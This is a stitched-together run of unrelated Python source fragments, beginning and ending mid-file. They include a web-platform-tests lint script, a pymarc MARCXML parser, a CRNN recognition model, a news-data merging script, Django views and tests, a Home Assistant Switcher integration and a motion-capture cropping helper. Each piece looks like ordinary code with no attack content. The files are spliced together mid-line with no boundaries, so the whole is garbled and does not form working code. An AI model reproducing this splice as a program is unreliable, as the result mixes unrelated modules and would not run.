item in error_count.items()) count = sum(error_count.values()) logger.info("") if count == 1: logger.info("There was 1 error (%s)" % (by_type,)) else: logger.info("There were %d errors (%s)" % (count, by_type)) def changed_files(wpt_root): # type: (Text) -> List[Text] revish = testfiles.get_revish(revish=None) changed, _ = testfiles.files_changed(revish, None, include_uncommitted=True, include_new=True) return [os.path.relpath(item, wpt_root) for item in changed] def lint_paths(kwargs, wpt_root): # type: (Dict[Text, Any], Text) -> List[Text] if kwargs.get("paths"): paths = [] for path in kwargs.get("paths", []): if os.path.isdir(path): path_dir = list(all_filesystem_paths(wpt_root, path)) paths.extend(path_dir) elif os.path.isfile(path): paths.append(os.path.relpath(os.path.abspath(path), wpt_root)) elif kwargs["all"]: paths = list(all_filesystem_paths(wpt_root)) else: changed_paths = changed_files(wpt_root) force_all = False for path in changed_paths: path = path.replace(os.path.sep, "/") if path == "lint.ignore" or path.startswith("tools/lint/"): force_all = True break paths = (list(changed_paths) if not force_all else list(all_filesystem_paths(wpt_root))) return paths def create_parser(): # type: () -> argparse.ArgumentParser parser = argparse.ArgumentParser() parser.add_argument("paths", nargs="*", help="List of paths to lint") parser.add_argument("--json", action="store_true", help="Output machine-readable JSON format") parser.add_argument("--markdown", action="store_true", help="Output markdown") parser.add_argument("--repo-root", type=ensure_text, help="The WPT directory. Use this " "option if the lint script exists outside the repository") parser.add_argument("--ignore-glob", type=ensure_text, action="append", help="Additional file glob to ignore (repeat to add more). " "Globs are matched against paths relative to REPO_ROOT " "using fnmatch, except that path separators are normalized.") parser.add_argument("--all", action="store_true", help="If no paths are passed, try to lint the whole " "working directory, not just files that changed") return parser def main(**kwargs_str): # type: (**Any) -> int kwargs = {ensure_text(key): value for key, value in iteritems(kwargs_str)} assert logger is not None if kwargs.get("json") and kwargs.get("markdown"): logger.critical("Cannot specify --json and --markdown") sys.exit(2) repo_root = kwargs.get('repo_root') or localpaths.repo_root output_format = {(True, False): "json", (False, True): "markdown", (False, False): "normal"}[(kwargs.get("json", False), kwargs.get("markdown", False))] if output_format == "markdown": setup_logging(True) paths = lint_paths(kwargs, repo_root) ignore_glob = kwargs.get("ignore_glob", []) return lint(repo_root, paths, output_format, ignore_glob) def lint(repo_root, paths, output_format, ignore_glob=None): # type: (Text, List[Text], Text, Optional[List[Text]]) -> int error_count = defaultdict(int) # type: Dict[Text, int] last = None with io.open(os.path.join(repo_root, "lint.ignore"), "r") as f: ignorelist, skipped_files = parse_ignorelist(f) if ignore_glob: skipped_files |= set(ignore_glob) output_errors = {"json": output_errors_json, "markdown": output_errors_markdown, "normal": output_errors_text}[output_format] def process_errors(errors): # type: (List[rules.Error]) -> Optional[Tuple[Text, Text]] """ Filters and prints the errors, and updates the ``error_count`` object. :param errors: a list of error tuples (error type, message, path, line number) :returns: ``None`` if there were no errors, or a tuple of the error type and the path otherwise """ errors = filter_ignorelist_errors(ignorelist, errors) if not errors: return None output_errors(errors) for error_type, error, path, line in errors: error_count[error_type] += 1 return (errors[-1][0], path) for path in paths[:]: abs_path = os.path.join(repo_root, path) if not os.path.exists(abs_path): paths.remove(path) continue if any(fnmatch.fnmatch(path, file_match) for file_match in skipped_files): paths.remove(path) continue errors = check_path(repo_root, path) last = process_errors(errors) or last if not os.path.isdir(abs_path): with io.open(abs_path, 'rb') as test_file: errors = check_file_contents(repo_root, path, test_file) last = process_errors(errors) or last errors = check_all_paths(repo_root, paths) last = process_errors(errors) or last if output_format in ("normal", "markdown"): output_error_count(error_count) if error_count: assert last is not None assert logger is not None for line in (ERROR_MSG % (last[0], last[1], last[0], last[1])).split("\n"): logger.info(line) return sum(itervalues(error_count)) path_lints = [check_file_type, check_path_length, check_worker_collision, check_ahem_copy, check_tentative_directories, check_gitignore_file] all_paths_lints = [check_css_globally_unique, check_unique_testharness_basenames] file_lints = [check_regexp_line, check_parsed, check_python_ast, check_script_metadata, check_ahem_system_font] # Don't break users of the lint that don't have git installed. try: subprocess.check_output(["git", "--version"]) all_paths_lints += [check_git_ignore] except subprocess.CalledProcessError: print('No git present; skipping .gitignore lint.') if __name__ == "__main__": args = create_parser().parse_args() error_count = main(**vars(args)) if error_count > 0: sys.exit(1) pymarc/marcxml.py "pymarc marcxml file." import logging from xml.sax import make_parser from xml.sax.handler import ContentHandler, feature_namespaces import unicodedata import six try: import xml.etree.ElementTree as ET # builtin in Python 2.5 except ImportError: import elementtree.ElementTree as ET from pymarc import Record, Field, MARC8ToUnicode XSI_NS = "http://www.w3.org/2001/XMLSchema-instance" MARC_XML_NS = "http://www.loc.gov/MARC21/slim" MARC_XML_SCHEMA = "http://www.loc.gov/MARC21/slim http://www.loc.gov/standards/marcxml/schema/MARC21slim.xsd" class XmlHandler(ContentHandler): """ You can subclass XmlHandler and add your own process_record method that'll be passed a pymarc.Record as it becomes available. This could be useful if you want to stream the records elsewhere (like to a rdbms) without having to store them all in memory. """ def __init__(self, strict=False, normalize_form=None): self.records = [] self._record = None self._field = None self._subfield_code = None self._text = [] self._strict = strict self.normalize_form = normalize_form def startElementNS(self, name, qname, attrs): if self._strict and name[0] != MARC_XML_NS: return element = name[1] self._text = [] if element == 'record': self._record = Record() elif element == 'controlfield': tag = attrs.getValue((None, u'tag')) self._field = Field(tag) elif element == 'datafield': tag = attrs.getValue((None, u'tag')) ind1 = attrs.get((None, u'ind1'), u' ') ind2 = attrs.get((None, u'ind2'), u' ') self._field = Field(tag, [ind1, ind2]) elif element == 'subfield': self._subfield_code = attrs[(None, 'code')] def endElementNS(self, name, qname): if self._strict and name[0] != MARC_XML_NS: return element = name[1] if self.normalize_form is not None: text = unicodedata.normalize(self.normalize_form, u''.join(self._text)) else: text = u''.join(self._text) if element == 'record': self.process_record(self._record) self._record = None elif element == 'leader': self._record.leader = text elif element == 'controlfield': self._field.data = text self._record.add_field(self._field) self._field = None elif element == 'datafield': self._record.add_field(self._field) self._field = None elif element == 'subfield': self._field.subfields.append(self._subfield_code) self._field.subfields.append(text) self._subfield_code = None self._text = [] def characters(self, chars): self._text.append(chars) def process_record(self, record): self.records.append(record) def parse_xml(xml_file, handler): """ parse a file with a given subclass of xml.sax.handler.ContentHandler """ parser = make_parser() parser.setContentHandler(handler) parser.setFeature(feature_namespaces, 1) parser.parse(xml_file) def map_xml(function, *files): """ map a function onto the file, so that for each record that is parsed the function will get called with the extracted record def do_it(r): print(r) map_xml(do_it, 'marc.xml') """ handler = XmlHandler() handler.process_record = function for xml_file in files: parse_xml(xml_file, handler) def parse_xml_to_array(xml_file, strict=False, normalize_form=None): """ parse an xml file and return the records as an array. Instead of passing in a file path you can also pass in an open file handle, or a file like object like StringIO. If you would like the parser to explicitly check the namespaces for the MARCSlim namespace use the strict=True option. Valid values for normalize_form are 'NFC', 'NFKC', 'NFD', and 'NFKD'. See unicodedata.normalize for more info on these. """ handler = XmlHandler(strict, normalize_form) parse_xml(xml_file, handler) return handler.records def record_to_xml(record, quiet=False, namespace=False): node = record_to_xml_node(record, quiet, namespace) return ET.tostring(node) def record_to_xml_node(record, quiet=False, namespace=False): """ converts a record object to a chunk of xml. If you would like to include the marcxml namespace in the root tag set namespace to True. """ # helper for converting non-unicode data to unicode # TODO: maybe should set g0 and g1 appropriately using 066 $a and $b? marc8 = MARC8ToUnicode(quiet=quiet) def translate(data): if type(data) == six.text_type: return data else: return marc8.translate(data) root = ET.Element('record') if namespace: root.set('xmlns', MARC_XML_NS) root.set('xmlns:xsi', XSI_NS) root.set('xsi:schemaLocation', MARC_XML_SCHEMA) leader = ET.SubElement(root, 'leader') leader.text = record.leader for field in record: if field.is_control_field(): control_field = ET.SubElement(root, 'controlfield') control_field.set('tag', field.tag) control_field.text = translate(field.data) else: data_field = ET.SubElement(root, 'datafield') data_field.set('tag', field.tag) data_field.set('ind1', field.indicators[0]) data_field.set('ind2', field.indicators[1]) for subfield in field: data_subfield = ET.SubElement(data_field, 'subfield') data_subfield.set('code', subfield[0]) data_subfield.text = translate(subfield[1]) return root dl/models/crnn/base.py1-10 from ..layers import * from ..base.model import ObjectRecognitionModelBase from .modules.codec import CTCCodec from ..._utils import _check_retval, _check_image, _get_normed_and_origin_img from torch.nn import functional as F import logging, abc class CRNNBase(ObjectRecognitionModelBase): def __init__(self, class_labels, input_shape, blankIndex): super().__init__(class_labels, input_shape) self.blankIndex = blankIndex self.codec = CTCCodec(class_labels, blankIndex) self.conv_layers = _check_retval('build_conv', self.build_conv(), nn.ModuleDict) self.rec_layers = _check_retval('build_rec', self.build_rec(), nn.ModuleDict) @property def encoder(self): return self.codec.encoder @property def decoder(self): return self.codec.decoder @abc.abstractmethod def build_conv(self): raise NotImplementedError() @abc.abstractmethod def build_rec(self): raise NotImplementedError() def forward(self, x, targets=None): """ :param x: input images tensor, shape = (b, c, h, w) :param targets: text numbers, list of tensor, represents number as text. tensor's shape = (length of text) :return: if training: predicts: output tensor, shape = (times, b, class_nums) targets: LongTensor, shape = (b, max length of text) pred_lengths: LongTensor, shape = (b,) target_lengths: LongTensor, shape = (b,) else: predicts: output tensor, shape = (times, b, class_nums) raw_texts: list(b) of str, raw strings decoded_texts: list(b) of str, decoded strings """ if self.training and targets is None: raise ValueError("pass \'targets\' for training mode") elif not self.training and targets is not None: logging.warning("forward as eval mode, but passed \'targets\'") batch_num = x.shape[0] for name, layer in self.conv_layers.items(): x = layer(x) b, c, h, w = x.shape assert h == 1, "the height of conv must be 1" # feature x = x.squeeze(2) # remove height due to 1 x = x.permute(2, 0, 1) # [w, b, c] for name, layer in self.rec_layers.items(): x = layer(x) if self.training: # apply log softmax for ctc loss, shape = (times, b, class_labels) predicts = F.log_softmax(x, dim=2) targets, target_lengths = self.encoder(targets) predict_lengths = torch.LongTensor([x.shape[0]] * batch_num) return predicts, targets, predict_lengths, target_lengths else: # apply softmax for prediction, shape = (times, b, class_labels) predicts = F.softmax(x, dim=2) raw_texts, out_texts = self.decoder(predicts) return predicts, raw_texts, out_texts def infer(self, image, toNorm=False): if self.training: raise NotImplementedError("call \'eval()\' first") # img: Tensor, shape = (b, c, h, w) img, orig_imgs = _check_image(image, self.device, size=(self.input_width, self.input_height)) # normed_img, orig_img: Tensor, shape = (b, c, h, w) normed_imgs, orig_imgs = _get_normed_and_origin_img(img, orig_imgs, (0.5,), (0.5,), toNorm, self.device) return self(normed_imgs)import json import csv import glob import errno import ast import config ############ Parsing Metadata File ############ def parse_metadata(metadata_path): metadata = {} with open(metadata_path) as csv_file: csv_reader = csv.reader(csv_file, delimiter=';') next(csv_reader) for row in csv_reader: metadata[int(row[1])] = { 'id_rumour': row[0], 'news_source': row[2], 'url': row[5], 'language': row[4], 'news_article_date': row[3], 'headline': '', 'subhead': '', 'body_text': '' } return metadata ############################################## ################### Scrapy ################### def parse_scrapy(scrapy_news_path,scrapy_news={}): sources = glob.glob(scrapy_news_path) for source in sources: with open(source, encoding='utf8') as f: json_file = json.load(f) news_articles = json_file['news_articles'] for news_article in news_articles: headline = news_article['headline'] subhead = news_article['subhead'] author = news_article['author'] body_text = news_article['body_text'] url = news_article['url'] datetime = news_article['datetime'] source = news_article['source'] scrapy_news[url] = { 'headline': headline, 'subhead': subhead, 'body_text': body_text } return scrapy_news ############################################## ############# Manual Collection ############## def parse_manual(man_col_path, manual_news={}): with open(man_col_path, encoding='utf8') as f: json_file = json.load(f) news_articles = json_file['news_articles'] for news_article in news_articles: #print(news_article) headline = news_article['title'] subhead = news_article['subtitle'] body_text = news_article['content'] url = news_article.get('link') id_news_article = news_article['id_news_article'] manual_news[int(id_news_article)] = { 'url': url, 'headline': headline, 'subhead': subhead, 'body_text': body_text } return manual_news ############################################## ################## Merging ################### def merge(metadata,scrapy_news,manual_news): for k,v in metadata.items(): url = metadata[k]['url'] #mnk = manual_news.keys() if(scrapy_news.get(url)): if(scrapy_news[url].get('headline')): metadata[k]['headline'] = scrapy_news[url]['headline'] if(scrapy_news[url].get('subhead')): metadata[k]['subhead'] = scrapy_news[url]['subhead'] if(scrapy_news[url].get('body_text')): body_text = scrapy_news[url]['body_text'] body_text = body_text.replace('\n', ' ').replace('\r', ' ') metadata[k]['body_text'] = ' '.join(body_text.split()) elif(manual_news.get(k)): if(manual_news[k].get('headline')): metadata[k]['headline'] = manual_news[k]['headline'] if(manual_news[k].get('subhead')): metadata[k]['subhead'] = manual_news[k]['subhead'] if(manual_news[k].get('body_text')): metadata[k]['body_text'] = manual_news[k]['body_text'] return metadata def save_merged(merged_path, parsed_news): news_file = open(merged_path, 'w', encoding='utf8') news_file.write(json.dumps(parsed_news, indent=4, ensure_ascii=False)) news_file.close() ############################################## ################ Sanity Check ################ def check_empty_values(parsed_news): print('Problems found at...') pcount = 0 for id_na, attrs in parsed_news.items(): problems = [] for k, v in attrs.items(): if k != 'subhead' and v == '': problems+=[k] pcount+=1 if(problems): #print('{}, {}, {}'.format(id_na, parsed_news[id_na]['news_source'], problems)) print('{}, {}, {}'.format(id_na, parsed_news[id_na]['url'], problems)) print('Total of {} problems found.'.format(pcount)) def check_missing_ids(parsed_news): ncount = 0 missing = [] keys = list(parsed_news.keys()) for count in range(len(keys)): count+=1 if(count not in keys): missing+=[count] print('Missing news: {}.'.format(missing)) def check_scrapy_error(scrapy_news): for k in scrapy_news.keys(): if not scrapy_news[k]['headline']: print(k, 'no headline') if not scrapy_news[k]['body_text']: print(k, 'no body text') ############################################## def main(): #Setting the paths scrapy_news_path = config.scrapy_news_path metadata_path = config.metadata_path man_col_path = config.man_sum_path merged_path = config.merged_path #Parse news collected with scrapy. scrapy_news = parse_scrapy(scrapy_news_path) #Check if scrapy data has errors. check_scrapy_error(scrapy_news) #Parse news manually collected. manual_news = parse_manual(man_col_path) #Parse csv metadata. metadata = parse_metadata(metadata_path) #Merge csv metadata, scrapy news and manual news. parsed_news = merge(metadata, scrapy_news, manual_news) #Save merged data. save_merged(merged_path,parsed_news) #Check if required attributes are valid. check_empty_values(parsed_news) #Check for missing sequential ids. #check_missing_ids(parsed_news) if __name__ == '__main__': main() Lodeiro0001/Python_VigoBusAPI """HELPERS Helper misc functions for external data management """ # # Native # # import inspect import datetime # # Project # # from vigobusapi.entities import Stop __all__ = ("get_package", "add_stop_created_timestamp") def get_package(function) -> str: """Return the package name from the given object (usually a function). Only return the last package (inmediate first parent of the object). """ return inspect.getmodule(function).__name__.split(".")[-1] def add_stop_created_timestamp(stop: Stop) -> Stop: """Add the 'created' field to the given Stop object, with the current datetime timestamp. The timestamp is created as a datetime object in the current local time and timezone. The input object is modified in-place. The same object is returned. """ utc_dt = datetime.datetime.now(datetime.timezone.utc) # UTC time local_dt = utc_dt.astimezone() # local time stop.created = local_dt return stop code/r_independence.py # -*- coding: utf-8 -*- # @Author: # @Date: 2016-12-14 22:10:04 # @Last Modified by: # @Last Modified time: 2016-12-15 12:07:46 import rpy2 import rpy2.robjects.numpy2ri import rpy2.robjects.pandas2ri import numpy as np from rpy2.robjects.packages import importr rpy2.robjects.numpy2ri.activate() rpy2.robjects.pandas2ri.activate() dHSIC_R = importr('dHSIC') bnlearn = importr('bnlearn') class dHSIC: def __init__(self, X, Y, alpha=0.05, method="gamma", kernel="gaussian", B=100, pairwise=False): self.res = dHSIC_R.dhsic_test(X, Y, alpha, method, kernel, B, pairwise) self.statistic = tuple(self.res[0])[0] self.critic_value = tuple(self.res[1])[0] self.p_value = tuple(self.res[2])[0] class CI: def __init__(self, X_var, Y_var, Z_vars, data, test='corr'): Z_vars = np.array(Z_vars) self.res = bnlearn.ci_test(X_var, Y_var, Z_vars, data, test=test) self.statistic = self.res[0][0] self.p_value = self.res[1][0] if __name__ == '__main__': passex011.py cor = {'traço': '\033[35m', 'ex': '\033[4;31m', 'título': '\033[1;34m', 'med': '\033[1;33m', 'res': '\033[1;32m', 'reset': '\033[m'} print('{}-=-{}'.format(cor['traço'], cor['reset'])*18, '{} Exercício 011 {}'.format(cor['ex'], cor['reset']), '{}-=-{}'.format(cor['traço'], cor['reset'])*18) print('{}Faça um programa que leia a largura e a altura de uma parede em metros, calcule a sua área e a quantidade de ' 'tinta necessária \npara pintá-la, sabendo que cada litro de tinta pinta uma área de 2 metros quadrados.{}' .format(cor['título'], cor['reset'])) print('{}-=-{}'.format(cor['traço'], cor['reset'])*42) comp = float(input('Qual o comprimento da parede (m): ')) alt = float(input('Qual a altura da parede (m): ')) area = comp * alt print('Em uma parede com dimenssões de {}{}{} x {}{}{} terá uma área de {}{:.2f}{}m².' .format(cor['med'], comp, cor['reset'], cor['med'], alt, cor['reset'], cor['res'], area, cor['reset'])) tinta = area / 2 print('Sendo assim, será preciso {}{:.3f}{} litros de tinta para pintá-la!'.format(cor['res'], tinta, cor['reset'])) firebot/modules/sql_helper/broadcast_sql.py10-100 from sqlalchemy import Column, String from . import BASE, SESSION class Broadcast(BASE): __tablename__ = "Broadcast" chat_id = Column(String(14), primary_key=True) def __init__(self, chat_id): self.chat_id = chat_id Broadcast.__table__.create(checkfirst=True) def add_chnnl_in_db(chat_id: int): chnnl_id = Broadcast(str(chat_id)) SESSION.add(chnnl_id) SESSION.commit() def get_all_chnnl(): stark = SESSION.query(Broadcast).all() SESSION.close() return stark def already_added(chat_id): try: return SESSION.query(Broadcast).filter(Broadcast.chat_id == str(chat_id)).one() except: return None finally: SESSION.close() def rm_channel(chat_id): remove = SESSION.query(Broadcast).get(str(chat_id)) if remove: SESSION.delete(remove) SESSION.commit() from django.apps import AppConfig class DialogflowapiConfig(AppConfig): name = 'DialogflowApi' from blanc_basic_pages.views import lazy_page from django.conf.urls import url from . import views urlpatterns = [ url(r'^$', views.ContactFormView.as_view(), name='form'), url(r'^thanks/$', lazy_page, name='form-thanks'), ] from django.contrib.auth import logout from django.shortcuts import redirect __author__ = 'tmehta' def logout_user(request): logout(request) return redirect('/')data/__all_models.py # Add all your SQLAlchemy models here. # This allows us to import just this file when # we need to preload the models and ensure they # are all loaded. import crud.data.post import crud.data.users 0 ต้องการโอน 2000 คุณมีเงิน 998 กรุณาโอนเงินเข้าบัญชี เงินไม่พอโอน ฝากเงินเท่าไหร่ ?: 200 --- คุณมีเงิน 1198 กรุณาโอนเงินเข้าบัญชี เงินไม่พอโอน ฝากเงินเท่าไหร่ ?: 900 --- คุณมีเงิน 2098 โอนได้เลย เหลือเงินในบัญชี: 83 ***Repl Closed*** import math print(math.fsum([.1, .1, .1, .1, .1, .1, .1, .1, .1, .1])) """Switcher integration Switch platform.""" from __future__ import annotations import asyncio from datetime import timedelta import logging from typing import Any from aioswitcher.api import Command, SwitcherApi, SwitcherBaseResponse from aioswitcher.device import DeviceCategory, DeviceState import voluptuous as vol from homeassistant.components.switch import ( DEVICE_CLASS_OUTLET, DEVICE_CLASS_SWITCH, SwitchEntity, ) from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant, callback from homeassistant.helpers import ( config_validation as cv, device_registry, entity_platform, ) from homeassistant.helpers.dispatcher import async_dispatcher_connect from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.update_coordinator import CoordinatorEntity from . import SwitcherDeviceWrapper from .const import ( CONF_AUTO_OFF, CONF_TIMER_MINUTES, SERVICE_SET_AUTO_OFF_NAME, SERVICE_TURN_ON_WITH_TIMER_NAME, SIGNAL_DEVICE_ADD, ) _LOGGER = logging.getLogger(__name__) SERVICE_SET_AUTO_OFF_SCHEMA = { vol.Required(CONF_AUTO_OFF): cv.time_period_str, } SERVICE_TURN_ON_WITH_TIMER_SCHEMA = { vol.Required(CONF_TIMER_MINUTES): vol.All( cv.positive_int, vol.Range(min=1, max=150) ), } async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback, ) -> None: """Set up Switcher switch from config entry.""" platform = entity_platform.async_get_current_platform() platform.async_register_entity_service( SERVICE_SET_AUTO_OFF_NAME, SERVICE_SET_AUTO_OFF_SCHEMA, "async_set_auto_off_service", ) platform.async_register_entity_service( SERVICE_TURN_ON_WITH_TIMER_NAME, SERVICE_TURN_ON_WITH_TIMER_SCHEMA, "async_turn_on_with_timer_service", ) @callback def async_add_switch(wrapper: SwitcherDeviceWrapper) -> None: """Add switch from Switcher device.""" if wrapper.data.device_type.category == DeviceCategory.POWER_PLUG: async_add_entities([SwitcherPowerPlugSwitchEntity(wrapper)]) elif wrapper.data.device_type.category == DeviceCategory.WATER_HEATER: async_add_entities([SwitcherWaterHeaterSwitchEntity(wrapper)]) config_entry.async_on_unload( async_dispatcher_connect(hass, SIGNAL_DEVICE_ADD, async_add_switch) ) class SwitcherBaseSwitchEntity(CoordinatorEntity, SwitchEntity): """Representation of a Switcher switch entity.""" def __init__(self, wrapper: SwitcherDeviceWrapper) -> None: """Initialize the entity.""" super().__init__(wrapper) self.wrapper = wrapper self.control_result: bool | None = None # Entity class attributes self._attr_name = wrapper.name self._attr_unique_id = f"{wrapper.device_id}-{wrapper.mac_address}" self._attr_device_info = { "connections": { (device_registry.CONNECTION_NETWORK_MAC, wrapper.mac_address) } } @callback def _handle_coordinator_update(self) -> None: """When device updates, clear control result that overrides state.""" self.control_result = None self.async_write_ha_state() async def _async_call_api(self, api: str, *args: Any) -> None: """Call Switcher API.""" _LOGGER.debug("Calling api for %s, api: '%s', args: %s", self.name, api, args) response: SwitcherBaseResponse = None error = None try: async with SwitcherApi( self.wrapper.data.ip_address, self.wrapper.device_id ) as swapi: response = await getattr(swapi, api)(*args) except (asyncio.TimeoutError, OSError, RuntimeError) as err: error = repr(err) if error or not response or not response.successful: _LOGGER.error( "Call api for %s failed, api: '%s', args: %s, response/error: %s", self.name, api, args, response or error, ) self.wrapper.last_update_success = False @property def is_on(self) -> bool: """Return True if entity is on.""" if self.control_result is not None: return self.control_result return bool(self.wrapper.data.device_state == DeviceState.ON) async def async_turn_on(self, **kwargs: Any) -> None: """Turn the entity on.""" await self._async_call_api("control_device", Command.ON) self.control_result = True self.async_write_ha_state() async def async_turn_off(self, **kwargs: Any) -> None: """Turn the entity off.""" await self._async_call_api("control_device", Command.OFF) self.control_result = False self.async_write_ha_state() async def async_set_auto_off_service(self, auto_off: timedelta) -> None: """Use for handling setting device auto-off service calls.""" _LOGGER.warning( "Service '%s' is not supported by %s", SERVICE_SET_AUTO_OFF_NAME, self.name, ) async def async_turn_on_with_timer_service(self, timer_minutes: int) -> None: """Use for turning device on with a timer service calls.""" _LOGGER.warning( "Service '%s' is not supported by %s", SERVICE_TURN_ON_WITH_TIMER_NAME, self.name, ) class SwitcherPowerPlugSwitchEntity(SwitcherBaseSwitchEntity): """Representation of a Switcher power plug switch entity.""" _attr_device_class = DEVICE_CLASS_OUTLET class SwitcherWaterHeaterSwitchEntity(SwitcherBaseSwitchEntity): """Representation of a Switcher water heater switch entity.""" _attr_device_class = DEVICE_CLASS_SWITCH async def async_set_auto_off_service(self, auto_off: timedelta) -> None: """Use for handling setting device auto-off service calls.""" await self._async_call_api("set_auto_shutdown", auto_off) self.async_write_ha_state() async def async_turn_on_with_timer_service(self, timer_minutes: int) -> None: """Use for turning device on with a timer service calls.""" await self._async_call_api("control_device", Command.ON, timer_minutes) self.control_result = True self.async_write_ha_state() # -*- encoding: utf-8 -*- import os import sys import uuid import pytest from django.apps import apps from django.contrib.auth.models import Group from django.core.files.base import ContentFile try: from django.core.urlresolvers import reverse except ImportError: from django.urls import reverse from django.db import transaction from django.http import Http404 from django.test.utils import override_settings from django.utils import timezone from model_mommy import mommy from bpp.models import Typ_KBN, Jezyk, Charakter_Formalny, Typ_Odpowiedzialnosci from bpp.tests.tests_legacy.testutil import UserTestCase, UserTransactionTestCase from bpp.tests.util import any_jednostka, any_autor, any_ciagle from bpp.util import rebuild_contenttypes from bpp.views.raporty import RaportSelector, PodgladRaportu, KasowanieRaportu from celeryui.models import Report class TestRaportSelector(UserTestCase): def test_raportselector(self): p = RaportSelector() p.request = self.factory.get('/') p.get_context_data() def test_raportselector_with_reports(self): for x, kiedy_ukonczono in enumerate([timezone.now(), None]): mommy.make( Report, arguments={}, file=None, finished_on=kiedy_ukonczono) self.client.get(reverse('bpp:raporty')) def test_tytuly_raportow_kronika_uczelni(self): any_ciagle(rok=2000) rep = Report.objects.create( ordered_by=self.user, function="kronika-uczelni", arguments={"rok": "2000"}) res = self.client.get(reverse('bpp:raporty')) self.assertContains( res, "Kronika Uczelni dla roku 2000", status_code=200) def test_tytuly_raportow_raport_dla_komisji_centralnej(self): a = any_autor("Kowalski", "Jan") rep = Report.objects.create( ordered_by=self.user, function="raport-dla-komisji-centralnej", arguments={"autor": a.pk}) res = self.client.get(reverse('bpp:raporty')) self.assertContains( res, "Raport dla Komisji Centralnej - %s" % str(a), status_code=200) class RaportMixin: def zrob_raport(self): r = mommy.make( Report, file=None, function="kronika-uczelni", arguments='{"rok":"2013"}') return r class TestPobranieRaportu(RaportMixin, UserTestCase): def setUp(self): UserTestCase.setUp(self) self.r = self.zrob_raport() error_class = OSError if sys.platform.startswith('win'): error_class = WindowsError try: os.unlink( os.path.join(settings.MEDIA_ROOT, 'raport', 'test_raport')) except error_class: pass self.r.file.save("test_raport", ContentFile("hej ho")) def test_pobranie_nginx(self): # Raport musi byc zakonczony, ineczej nie ma pobrania self.r.finished_on = timezone.now() self.r.save() with override_settings(SENDFILE_BACKEND='sendfile.backends.nginx'): url = reverse('bpp:pobranie-raportu', kwargs=dict(uid=self.r.uid)) resp = self.client.get(url) self.assertEqual(resp.status_code, 200) self.assertIn('x-accel-redirect', resp._headers) class TestPodgladRaportu(RaportMixin, UserTestCase): def setUp(self): UserTestCase.setUp(self) self.r = self.zrob_raport() def test_podgladraportu(self): p = PodgladRaportu() p.kwargs = {} p.kwargs['uid'] = self.r.uid self.assertEqual(p.get_object(), self.r) p.kwargs['uid'] = str(uuid.uuid4()) self.assertRaises(Http404, p.get_object) def test_podgladraportu_client(self): url = reverse('bpp:podglad-raportu', kwargs=dict(uid=self.r.uid)) resp = self.client.get(url) self.assertContains(resp, 'Kronika Uczelni', status_code=200) class KasowanieRaportuMixin: def setUp(self): self.r = self.zrob_raport() self.r.ordered_by = self.user self.r.save() class TestKasowanieRaportu(KasowanieRaportuMixin, RaportMixin, UserTestCase): def setUp(self): UserTestCase.setUp(self) KasowanieRaportuMixin.setUp(self) def test_kasowanieraportu(self): k = KasowanieRaportu() k.kwargs = dict(uid=self.r.uid) class FakeRequest: user = self.user k.request = FakeRequest() k.request.user = None self.assertRaises(Http404, k.get_object) k.request.user = self.user self.assertEqual(k.get_object(), self.r) def test_kasowanieraportu_client(self): self.assertEqual(Report.objects.count(), 1) url = reverse('bpp:kasowanie-raportu', kwargs=dict(uid=self.r.uid)) resp = self.client.get(url) self.assertRedirects(resp, reverse("bpp:raporty")) self.assertEqual(Report.objects.count(), 0) from django.conf import settings class TestWidokiRaportJednostek2012(UserTestCase): # fixtures = ['charakter_formalny.json', # 'jezyk.json', # 'typ_kbn.json', # 'typ_odpowiedzialnosci.json'] def setUp(self): UserTestCase.setUp(self) self.j = any_jednostka() Typ_KBN.objects.get_or_create(skrot="PW", nazwa="Praca wieloośrodkowa") Jezyk.objects.get_or_create(skrot='pol.', nazwa='polski') Charakter_Formalny.objects.get_or_create(skrot='KSZ', nazwa='Książka w języku obcym') Charakter_Formalny.objects.get_or_create(skrot='KSP', nazwa='Książka w języku polskim') Charakter_Formalny.objects.get_or_create(skrot='KS', nazwa='Książka') Charakter_Formalny.objects.get_or_create(skrot='ROZ', nazwa='') Group.objects.get_or_create(name="wprowadzanie danych") def test_jeden_rok(self): url = reverse("bpp:raport-jednostek-rok-min-max", args=(self.j.pk, 2010, 2013)) res = self.client.get(url) self.assertContains( res, "Dane o publikacjach za okres 2010 - 2013", status_code=200) def test_zakres_lat(self): url = reverse("bpp:raport-jednostek", args=(self.j.pk, 2013)) res = self.client.get(url) self.assertContains( res, "Dane o publikacjach za rok 2013", status_code=200) class TestRankingAutorow(UserTestCase): def setUp(self): UserTestCase.setUp(self) rebuild_contenttypes() Typ_Odpowiedzialnosci.objects.get_or_create(skrot='aut.', nazwa='autor') Group.objects.get_or_create(name="wprowadzanie danych") j = any_jednostka() a = any_autor(nazwisko="Kowalski") c = any_ciagle(impact_factor=200, rok=2000) c.dodaj_autora(a, j) def test_renderowanie(self): url = reverse("bpp:ranking-autorow", args=(2000, 2000)) res = self.client.get(url) self.assertContains( res, "Ranking autorów", status_code=200) self.assertContains(res, "Kowalski") def test_renderowanie_csv(self): url = reverse("bpp:ranking-autorow", args=(2000, 2000)) res = self.client.get(url, data={"_export": "csv"}) self.assertContains( res, '", dr",Jednostka') 0 import btk import glob import pandas as pd import numpy as np import matplotlib.pyplot as plt import importlib from ezc3d import c3d from pyomeca import Analogs from pyomeca import Markers from matplotlib.pyplot import subplot def cropp_c3dfile(eventsFrame, filename, destiny): """ Funkcja oddzielajaca pojedyncze ruchy w odrebne pliki na podstawie danych o markerach. Input: -eventsFrame - poczatek i koniec wycinka w formacie [[a,b],[a,b],...] -filename - sciezka pliku do podzielenia -destiny - sciezka, do ktorej zostana zapisane wyodrebnione czesci Output: - Podzielone pliki c3d zawierajace dane o pojedynczym ruchu """ reader = btk.btkAcquisitionFileReader() reader.SetFilename(filename) reader.Update() acq = reader.GetOutput() writer = btk.btkAcquisitionFileWriter() for i in range(0, len(eventsFrame)): clone = acq.Clone(); clone.ResizeFrameNumberFromEnd(acq.GetLastFrame() - eventsFrame[i][0] + 1) clone.ResizeFrameNumber(eventsFrame[i][1] - eventsFrame[i][0] + 1) clone.SetFirstFrame(eventsFrame[i][0]) clone.ClearEvents() for e in btk.Iterate(acq.GetEvents()): if ((e.GetFrame() > clone.GetFirstFrame()) and (e.GetFrame() < clone.GetLastFrame())): clone.AppendEvent(e) clone.SetFirstFrame(1) writer.SetInput(clone) writer.SetFilename(destiny + '\\' + 